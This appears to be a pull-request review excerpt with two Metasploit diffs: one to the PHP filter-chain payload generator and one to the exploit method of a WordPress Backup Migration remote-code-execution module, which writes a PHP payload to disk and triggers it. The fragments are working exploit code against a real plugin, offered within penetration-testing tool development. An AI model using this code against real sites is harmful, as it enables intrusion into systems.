Responded to comments

lib/msf/core/exploit/remote/http/php_filter_chain.rb

@@ -95,14 +95,14 @@ def generate_php_filter_payload(command)
             chain = command.encode("UTF-8")
             encoded_chain = Base64.strict_encode64(chain).encode("UTF-8").chomp("=")
             filters = "convert.iconv.UTF8.CSISO2022KR|"
-            filters += "convert.base64-encode|"
-            filters += "convert.iconv.UTF8.UTF7|"
+            filters << "convert.base64-encode|"
+            filters << "convert.iconv.UTF8.UTF7|"
 
             encoded_chain.reverse.each_char do |c|
-              filters += CONVERSIONS[c] + "|"
-              filters += "convert.base64-decode|"
-              filters += "convert.base64-encode|"
-              filters += "convert.iconv.UTF8.UTF7|"
+              filters << CONVERSIONS[c] + "|"
+              filters << "convert.base64-decode|"
+              filters << "convert.base64-encode|"
+              filters << "convert.iconv.UTF8.UTF7|"
             end
 
             filters += "convert.base64-decode"

modules/exploits/multi/http/wp_backup_migration_php_filter.rb

@@ -121,7 +121,7 @@ def trigger_payload_file
   def exploit
     print_status('Writing the payload to disk, character by character, please wait...')
     # Use double quotes in the payload, not single.
-    write_to_payload_file(payload.encoded.gsub!("'", '"'))
+    write_to_payload_file("<?php #{payload.encoded}")
     trigger_payload_file
   end
 end